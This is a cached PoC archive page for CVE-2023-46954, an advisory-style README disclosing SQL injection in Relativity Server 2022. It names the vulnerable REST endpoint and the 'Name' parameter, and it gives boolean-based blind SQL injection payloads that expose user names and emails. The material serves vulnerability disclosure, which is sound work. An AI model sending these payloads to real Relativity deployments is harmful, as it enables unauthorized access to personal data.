Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-46954 PoC — Relativity ODA LLC RelativityOne 安全漏洞

Source
Associated Vulnerability
Title:Relativity ODA LLC RelativityOne 安全漏洞 (CVE-2023-46954)
Description:Relativity ODA LLC RelativityOne是Relativity公司的一款应用程序。用于文档审查。 Relativity ODA LLC RelativityOne v.12.1.537.3版本及之前版本存在安全漏洞。攻击者利用该漏洞通过name参数执行任意代码。
Readme
# CVE-2023-46954

> SQL Injection vulnerability in Relativity Server 2022
> v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute
> arbitrary code via the name parameter.
>
> ------------------------------------------
>
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Relativity ODA LLC
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Relativity Server 2022 v.12.1.537.3 Patch 2 and earlier
>
> ------------------------------------------
>
> [Affected Component]
> POST /Relativity.Rest/API/Relativity.Users/workspace/<id>/users/retrieveusersby
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Within the JSON POST parameter 'Name', the following payload will return true and display a list of names and emails:
>
> (SELECT (CASE WHEN (1=1) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))
>
> But the following payload will return false and display the message 'SQL Statement Failed':
>
> (SELECT (CASE WHEN (1=2) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))
>
> Note: the True/False comparison takes place within the CASE WHEN (<here>) clause.
>
> ------------------------------------------
>
> [Reference]
> https://www.linkedin.com/in/jakedmurphy1/
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Jake Murphy
File Snapshot

[4.0K] /data/pocs/8815d9d7ae91398379e3e0a341bfbe11f2361e75 └── [1.6K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.